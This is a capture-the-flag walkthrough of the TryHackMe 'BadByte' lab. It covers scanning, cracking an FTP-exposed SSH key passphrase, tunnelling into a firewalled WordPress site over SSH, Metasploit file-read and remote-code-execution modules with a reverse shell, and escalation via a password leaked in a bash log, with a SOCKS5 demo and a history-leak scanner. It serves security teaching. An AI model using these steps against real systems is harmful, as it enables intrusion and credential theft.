TryHackMe BadByte – How I Used Port Forwarding to Hack Into An Internal Site’s Server


Port forwarding is a networking technique that allows a user to access services on a computer or network behind a firewall or router. It opens up specific ports on a computer or network to allow external devices to connect and access services and applications on the internal network.


Challenge Overview

  • Link: https://tryhackme.com/room/badbyte
  • Difficulty: Easy
  • Target: “user.txt”, “root.txt” on the targetIP
  • Highlight: Using port forwarding to make an internal website accessible  (i.e., hackable) outside the network.
  • Tags: FTP, port forwarding

RECON

Let’s start by noting down our IP addresses and exporting them as variables in the terminal (the commands below spell out the literal values, but $targetIP and $myIP work just as well).

export targetIP=10.10.241.193
export myIP=10.6.2.23

Next, let’s run a full TCP port scan with Nmap. -p- covers all 65535 ports instead of the default top 1000, and -vv (very verbose) prints each open port as soon as it is discovered, so we can start working on a port before the scan finishes.

┌─[kalisurfer@parrot]─[~]
└──╼ $nmap -p- -vv 10.10.241.193
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-30 14:24 EST
Initiating Ping Scan at 14:24
Scanning 10.10.241.193 [2 ports]
Completed Ping Scan at 14:24, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:24
Completed Parallel DNS resolution of 1 host. at 14:24, 0.03s elapsed
Initiating Connect Scan at 14:24
Scanning 10.10.241.193 [65535 ports]
Discovered open port 22/tcp on 10.10.241.193
Increasing send delay for 10.10.241.193 from 0 to 5 due to 45 out of 149 dropped probes since last increase.
Discovered open port 30024/tcp on 10.10.241.193

Now we’ll run another more targeted Nmap scan to drill in on the open ports.

┌─[kalisurfer@parrot]─[~]
└──╼ $nmap -A -p 22,30024 10.10.241.193
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-30 14:26 EST
Nmap scan report for 10.10.241.193
Host is up (0.086s latency).

PORT  	STATE SERVICE VERSION
22/tcp	open  ssh 	OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f3:a2:ed:93:4b:9c:bf:bb:33:4d:48:0d:fe:a4:de:96 (RSA)
|   256 22:72:00:36:eb:37:12:9f:5a:cc:c2:73:e0:4f:f1:4e (ECDSA)
|_  256 78:1d:79:dc:8d:41:f6:77:60:65:f5:74:b6:cc:8b:6d (ED25519)
30024/tcp open  ftp 	vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|  	Connected to ::ffff:10.6.2.23
|  	Logged in as ftp
|  	TYPE: ASCII
|  	No session bandwidth limit
|  	Session timeout in seconds is 300
|  	Control connection is plain text
|  	Data connections will be plain text
|  	At session startup, client count was 3
|  	vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--	1 ftp  	ftp      	1743 Mar 23  2021 id_rsa
|_-rw-r--r--	1 ftp  	ftp        	78 Mar 23  2021 note.txt
Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.78 seconds

Let’s focus first on the FTP service running on port 30024. It allows anonymous login, so we should be able to view and copy the two files found in the directory.

We can log into the FTP service (lftp uses an anonymous login by default) and then pull both files with a single get:

lftp -p 30024 10.10.241.193
get id_rsa note.txt

In note.txt we find a clue mentioning a possible username: errorcauser

CRACKING THE SSH KEY PASSPHRASE WITH JOHN

Let’s first attempt to log in using the id_rsa file as the SSH private key:

ssh -i id_rsa errorcauser@10.10.241.193

We get the following error: Permissions 0644 for 'id_rsa' are too open

SSH refuses a private key that other users on the machine can read. The file is ours, so no sudo is needed; we just tighten the permissions:

chmod 600 id_rsa

The key itself is encrypted with a passphrase, so the other thing we need to do is use John the Ripper to crack it.

First, we convert the key into a hash format John understands using ssh2john.py. The script ships with John (run/ssh2john.py in the John the Ripper repository; Kali and Parrot also install it as /usr/share/john/ssh2john.py). My attack machine didn’t have it on the path, so I grabbed it from the repository and ran it with the following command to save the hash in a new file:

python3 ssh2john.py id_rsa > hash

Next, we run John the Ripper on the hash with the simple command (with no options John walks through its default modes: single, its built-in wordlist, then incremental; add --wordlist=/usr/share/wordlists/rockyou.txt if that is too slow):

john hash

A few seconds later John finds the passphrase: cupcake. Together with the username from note.txt (errorcauser) we now have everything we need to ssh into the target machine.

SETTING UP PORT FORWARDING

In this box, a firewall on the target blocks outside access to the website hosted on port 80; the site is only reachable from the target itself, on 127.0.0.1.

We can get around the firewall by tunnelling through the SSH access we just obtained. Let’s start with dynamic port forwarding. SSH in with the key, entering the passphrase (cupcake) when prompted; the key is ours, so no sudo is needed:

ssh -i id_rsa -D 1337 errorcauser@10.10.241.193

(-D 1337 makes the SSH client listen on 127.0.0.1:1337 as a SOCKS proxy; every connection sent to that port is opened by sshd on the target, i.e. from the far end of the tunnel.)

And we are in as user errorcauser!

Now we need to point proxychains at that port. In /etc/proxychains.conf (or /etc/proxychains4.conf, depending on the package), in the [ProxyList] section at the end of the file, comment out the default Tor entry (socks4 127.0.0.1 9050) and add:

socks5 127.0.0.1 1337

With the SSH session left open, run an Nmap scan of the target’s loopback through the proxy from a second terminal:

proxychains nmap -sT 127.0.0.1

(-sT for a TCP connect scan. proxychains works by hooking connect(), so a connect scan is the only scan type that actually travels through the tunnel; raw SYN probes and ICMP pings do not, so do not run this as root, and add -Pn if Nmap reports the host as down. Because the proxy sits on the target, 127.0.0.1 here means the target’s loopback, exactly where the firewalled site listens.)

Next, we set up local port forwarding so the site is reachable from our browser and other tools without proxychains. The only reason for sudo here is that binding local port 80 requires root; -L 8080:127.0.0.1:80 would avoid it:

sudo ssh -i id_rsa -L 80:127.0.0.1:80 errorcauser@10.10.241.193

(-L 80:127.0.0.1:80: listen on our port 80 and hand every connection to 127.0.0.1:80 as seen from the target.)

And now that everything is set up for port forwarding, we can check to see if our browser can open the website at http://127.0.0.1

Bingo! Port forwarding is now running as intended!
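To make concrete what the -D tunnel and proxychains are doing, here is an added example (not code from the write-up or from TryHackMe): a minimal SOCKS5 CONNECT exchange in Python with both sides present, the proxy half (the role sshd plays at the far end of -D) and the client half (the handshake proxychains injects into every connect() that nmap makes). The demo starts a stand-in for the firewalled site on an ephemeral loopback port and reaches it only through the proxy, so the hosts, ports and the HTTP banner are constructed for the demo and are not BadByte’s.

```python
import socket
import struct
import threading
from contextlib import suppress
VER, CONNECT, IPV4, DOMAIN, IPV6 = 5, 1, 1, 3, 4
# Constructed reply for the stand-in "internal site" (not BadByte's real page).
INTERNAL_BANNER = b"HTTP/1.0 200 OK\r\n\r\ninternal wordpress (constructed)\r\n"

def recv_exact(sock, n):
    """SOCKS fields are fixed-width: read exactly n bytes or fail loudly."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed mid-handshake")
        buf += chunk
    return buf

def socks5_connect(proxy_addr, dst_host, dst_port):
    """Client side (what proxychains does per connect()); dst is resolved BY THE PROXY."""
    s = socket.create_connection(proxy_addr, timeout=5.0)
    s.sendall(bytes([VER, 1, 0]))                      # offer one auth method: 0 = none
    if recv_exact(s, 2) != bytes([VER, 0]):
        s.close()
        raise ConnectionError("proxy rejected no-auth")
    name = dst_host.encode()                           # ATYP 3: let the proxy resolve it
    s.sendall(bytes([VER, CONNECT, 0, DOMAIN, len(name)]) + name + struct.pack("!H", dst_port))
    ver, rep, _rsv, atyp = recv_exact(s, 4)
    # BND.ADDR is variable width (4 / 16 / length-prefixed), then a 2-byte BND.PORT
    recv_exact(s, {IPV4: 4, IPV6: 16}.get(atyp) or recv_exact(s, 1)[0])
    recv_exact(s, 2)
    if ver != VER or rep != 0:
        s.close()
        raise ConnectionError("CONNECT failed, REP=0x%02x" % rep)
    return s

def _pipe(src, dst):
    """Relay one direction until EOF, then half-close the other side."""
    with suppress(OSError):
        while data := src.recv(4096):
            dst.sendall(data)
    with suppress(OSError):
        dst.shutdown(socket.SHUT_WR)

def _reply(client, rep, bound=("0.0.0.0", 0)):
    client.sendall(bytes([VER, rep, 0, IPV4]) + socket.inet_aton(bound[0]) + struct.pack("!H", bound[1]))

def _handle_client(client):
    """Proxy side (the role sshd plays at the far end of -D): no-auth, CONNECT, relay."""
    with suppress(OSError), client:
        ver, nmethods = recv_exact(client, 2)
        if ver != VER or 0 not in recv_exact(client, nmethods):
            return client.sendall(bytes([VER, 0xFF]))  # no acceptable auth method
        client.sendall(bytes([VER, 0]))
        _ver, cmd, _rsv, atyp = recv_exact(client, 4)
        if cmd != CONNECT or atyp not in (IPV4, DOMAIN):
            return _reply(client, 7 if cmd != CONNECT else 8)   # cmd / addr type unsupported
        host = (socket.inet_ntoa(recv_exact(client, 4)) if atyp == IPV4
                else recv_exact(client, recv_exact(client, 1)[0]).decode())
        port = struct.unpack("!H", recv_exact(client, 2))[0]
        try:                                           # the real connect happens HERE, proxy-side
            upstream = socket.create_connection((host, port), timeout=5.0)
        except OSError:
            return _reply(client, 5)                   # REP 5 = connection refused
        _reply(client, 0, upstream.getsockname()[:2])
        threading.Thread(target=_pipe, args=(upstream, client), daemon=True).start()
        _pipe(client, upstream)

def _serve(handler):
    """Listen on an ephemeral loopback port, accept in a daemon thread, return (host, port)."""
    srv = socket.create_server(("127.0.0.1", 0))
    def loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=handler, args=(conn,), daemon=True).start()
    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[:2]

def _answer_once(conn):
    """The 'internal site': read the request, send the banner, close (EOF to the client)."""
    with conn:
        conn.recv(4096)
        conn.sendall(INTERNAL_BANNER)

def demo():
    """Reach the stand-in site via the stand-in proxy; returns the raw HTTP reply."""
    proxy = _serve(_handle_client)                     # plays `ssh -D 1337`
    _host, internal_port = _serve(_answer_once)        # plays the firewalled port-80 site
    # "127.0.0.1" is resolved by the proxy, so it names the tunnel's far-end loopback.
    with socks5_connect(proxy, "127.0.0.1", internal_port) as s:
        s.sendall(b"GET / HTTP/1.0\r\nHost: 127.0.0.1\r\n\r\n")
        chunks = []
        while data := s.recv(4096):
            chunks.append(data)
    return b"".join(chunks)

if __name__ == "__main__":
    print(demo().decode())
```

Two things this makes visible. The destination address travels to the proxy as a name or raw IP and the connect() is performed there, which is why 127.0.0.1 in proxychains nmap means the target’s loopback and why only connect-based tools work through it. And a connect the proxy cannot complete comes back as a REP code rather than a TCP reset, which is the signal proxychains turns into a failed connection and Nmap’s connect scan reports as closed.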

ENUMERATING WORDPRESS

Walking the website reveals hints that it is a WordPress site. We can use a dedicated Nmap script to enumerate WordPress plugins and themes. Note what this scan actually touches: it runs against our own 127.0.0.1 without proxychains, so only port 80 reaches BadByte (through the -L forward); any other port that shows up open belongs to the attack machine’s loopback, not the target. sudo is not needed for -sV; without it Nmap simply falls back to a connect scan.

┌─[kalisurfer@parrot]─[~/THM/badbyte-walkthrough]
└──╼ $sudo nmap -sV --script http-wordpress-enum 127.0.0.1
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-30 15:12 EST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.0000060s latency).
Not shown: 996 closed tcp ports (reset)
PORT 	STATE SERVICE	VERSION
21/tcp   open  ftp    	vsftpd 3.0.3
80/tcp   open  http   	Apache httpd 2.4.29 ((Ubuntu))
| http-wordpress-enum:
| Search limited to top 100 themes/plugins
|   plugins
|_	duplicator 1.3.26
|_http-server-header: Apache/2.4.29 (Ubuntu)
111/tcp  open  rpcbind	2-4 (RPC #100000)
| rpcinfo:
|   program version	port/proto  service
|   100000  2,3,4    	111/tcp   rpcbind
|   100000  2,3,4    	111/udp   rpcbind
|   100000  3,4      	111/tcp6  rpcbind
|_  100000  3,4      	111/udp6  rpcbind
5432/tcp open  postgresql PostgreSQL DB 9.6.0 or later
| fingerprint-strings:
|   SMBProgNeg:
| 	SFATAL
| 	VFATAL
| 	C0A000
| 	Munsupported frontend protocol 65363.19778: server supports 2.0 to 3.0
| 	Fpostmaster.c
| 	L2127
|_	RProcessStartupPacket
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5432-TCP:V=7.92%I=7%D=12/30%Time=63AF464A%P=x86_64-pc-linux-gnu%r(S
SF:MBProgNeg,8C,"E\0\0\0\x8bSFATAL\0VFATAL\0C0A000\0Munsupported\x20fronte
SF:nd\x20protocol\x2065363\.19778:\x20server\x20supports\x202\.0\x20to\x20
SF:3\.0\0Fpostmaster\.c\0L2127\0RProcessStartupPacket\0\0");
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.74 seconds

Another option for WordPress enumeration is the classic command-line tool wpscan. Note in the output below that its default, passive plugin detection finds nothing, whereas the Nmap script above already saw Duplicator 1.3.26; rerun with --enumerate p --plugins-detection aggressive (and a WPScan API token) to brute-force known plugin paths and get vulnerability data:

┌─[kalisurfer@parrot]─[~/THM/badbyte-walkthrough]
└──╼ $wpscan --url 127.0.0.1
_______________________________________________________________
     	__      	_______   _____
     	\ \    	/ /  __ \ / ____|
      	\ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
       	\ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
        	\  /\  /  | | 	____) | (__| (_| | | | |
         	\/  \/   |_|	|_____/ \___|\__,_|_| |_|

     	WordPress Security Scanner by the WPScan Team
                     	Version 3.8.21
                          	 
   	@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://127.0.0.1/ [127.0.0.1]
[+] Started: Fri Dec 30 15:27:00 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://127.0.0.1/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://127.0.0.1/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://127.0.0.1/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.7 identified (Insecure, released on 2021-03-09).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://127.0.0.1/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.7'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://127.0.0.1/, Match: 'WordPress 5.7'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:03 <===============> (137 / 137) 100.00% Time: 00:00:03

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Dec 30 15:27:10 2022
[+] Requests Done: 180
[+] Cached Requests: 4
[+] Data Sent: 41.932 KB
[+] Data Received: 19.464 MB
[+] Memory used: 239.887 MB
[+] Elapsed time: 00:00:10

EXPLOITING WORDPRESS PLUGINS WITH METASPLOIT

Now it is time to fire up Metasploit and search for modules that target the plugins present on the site: duplicator (1.3.26, per the Nmap script) and file-manager.

Because the site is only reachable through our tunnel, both modules are pointed at the local forward (RHOSTS 127.0.0.1, RPORT 80) while a reverse-shell callback still uses our VPN address (LHOST 10.6.2.23), since that connection is opened by the target, not by us. If the callback does not arrive, a bind payload or a remote forward (ssh -R) over the existing session is the fallback.

The first module (auxiliary/scanner/http/wp_duplicator_file_read) reads arbitrary files from the web server through a path traversal in Duplicator; pointed at /etc/passwd it gives us the local usernames. We’ll save this for later in case it comes in handy.

The second module (exploit/multi/http/wp_file_manager_rce) abuses the File Manager plugin’s unauthenticated upload to drop a PHP payload and get remote code execution. We will go forward with this attack vector to gain our initial foothold.

From the resulting shell we find user.txt in user cth’s home directory. Next, we continue enumerating the machine for ways to escalate privileges.

PRIVILEGE ESCALATION

The file /var/log/bash.log, a log of user cth’s shell commands, turns out to be readable from our foothold.

A misspelling of sudo by cth caused him to accidentally type his previous password in cleartext at the shell prompt (G00dP@$sw0rd2020). Maybe the new one is G00dP@$sw0rd2021.

Let’s try it and, lo and behold, it works! I think it’s time for user cth to get a completely new password, not just keep changing the end to the current year!
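As an added example (not part of the write-up), here is the check a pentester, or a defender reviewing shell histories, could run over a log like /var/log/bash.log to find exactly this class of leak: a mistyped sudo immediately followed by a lone password-looking token, plus the year-rotation guesses the write-up made by hand. The log format (one command per line, like bash history) and the sample lines are assumed and constructed; the leaked value in the sample is the one found on the box above.

```python
import re

SUDO_TYPO_MAX_EDITS = 1   # "suod", "sduo", "sud", "sudp" ... but never "sudo" itself
CHAR_CLASSES = (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]")

# Constructed history lines in the shape of /var/log/bash.log (one command per line).
SAMPLE_LOG = """\
ls -la
cd /var/www/html
suod systemctl restart apache2
G00dP@$sw0rd2020
sudo systemctl restart apache2
git pull
""".splitlines()

def osa_distance(a, b):
    """Optimal string alignment distance: insert/delete/substitute plus adjacent
    transposition, so both `suod` and `sduo` are 1 edit away from `sudo`."""
    rows = [list(range(len(b) + 1))]
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cost = min(rows[-1][j] + 1, cur[j - 1] + 1, rows[-1][j - 1] + (ca != cb))
            if i > 1 and j > 1 and ca == b[j - 2] and a[i - 2] == cb:
                cost = min(cost, rows[-2][j - 2] + 1)
            cur.append(cost)
        rows.append(cur)
    return rows[-1][-1]

def is_sudo_typo(word):
    """True for a command word that is a near miss of `sudo` (the shell said 'not found')."""
    w = word.lower()
    return w != "sudo" and osa_distance(w, "sudo") <= SUDO_TYPO_MAX_EDITS

def looks_like_password(token):
    """A single token (no spaces), 8+ chars, drawing on at least three character classes."""
    if " " in token or len(token) < 8:
        return False
    return sum(bool(re.search(p, token)) for p in CHAR_CLASSES) >= 3

def find_leaked_passwords(lines):
    """Return (line_no, typo_command, candidate) for each mistyped sudo that is
    immediately followed by a password-looking line. The user expected a password
    prompt that never came, so the password landed in the history as a 'command'.
    line_no is 1-based and points at the candidate line."""
    hits = []
    for idx in range(len(lines) - 1):
        cmd, nxt = lines[idx].strip(), lines[idx + 1].strip()
        if cmd and is_sudo_typo(cmd.split()[0]) and looks_like_password(nxt):
            hits.append((idx + 2, cmd, nxt))
    return hits

def year_rotation_guesses(password, years=range(2019, 2026)):
    """If the leaked value ends in a year, return the same stem with the other years:
    the 'password2020 -> password2021' guess that worked on this box."""
    m = re.fullmatch(r"(.*?)(20\d\d)", password)
    if not m:
        return []
    stem, seen = m.group(1), int(m.group(2))
    return [f"{stem}{y}" for y in years if y != seen]

if __name__ == "__main__":
    for line_no, cmd, secret in find_leaked_passwords(SAMPLE_LOG):
        print(f"line {line_no}: after {cmd!r} -> {secret}")
        print("  try next:", ", ".join(year_rotation_guesses(secret)))
```

The transposition-aware distance matters: plain Levenshtein scores `suod` as two edits from `sudo` and would miss the most common slip. On a real engagement the same scan belongs in the post-exploitation checklist alongside .bash_history, .mysql_history and auditd logs, since the year-rotation guess only works when the leaked value is recent.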

Now we can SSH in as cth with that password:

ssh cth@10.10.241.193

And the final step is to cat out root.txt; cth is allowed to run it with sudo (the same password is asked for again):

sudo cat /root/root.txt

Where To Next?

Among other tools, we used a port scanner in this tutorial. Want to dive deeper into security research? Read on here:

👉 Recommended Tutorial: Creating a Port Scanner with Python Networking Sockets